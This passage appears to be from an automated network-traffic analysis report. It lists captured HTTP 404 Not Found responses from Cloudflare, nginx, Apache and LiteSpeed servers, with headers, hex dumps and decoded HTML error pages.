c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:30:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Um%2BrAlG4hRyOm9rjqy6%2Fr7f79PY8UyruFKVS4Dcf8VRxaNA9jMXuOJPZLTET2Z9teMZkAaNR%2FJ8qmRsqnVl1BA6AGXZFUm1MOmaKUerI4aAROMutxoIybmY5W0UmIwmB%2BG3S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2b9300ff961b2-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118829&min_rtt=118829&rtt_var=59414&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7968&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:30:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PjoBrH6GI0lMhP4sDHLE4C07XV5ZhJn1NHlbFwHcHE9FCmFKbtQnzS%2B5bcwWBDV8EVXjoNdT%2BdurhdilIdXNTOwikQzR7PitwNneySRO5CyFjGPZovYaMW6k6rAZkUH4x1wG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2b9409a4b6378-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118859&min_rtt=118859&rtt_var=59429&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=540&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:30:49 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:30:52 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:30:55 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:30:57 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 07:31:12 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 07:31:15 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 07:31:18 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 07:31:41 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 07:31:43 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 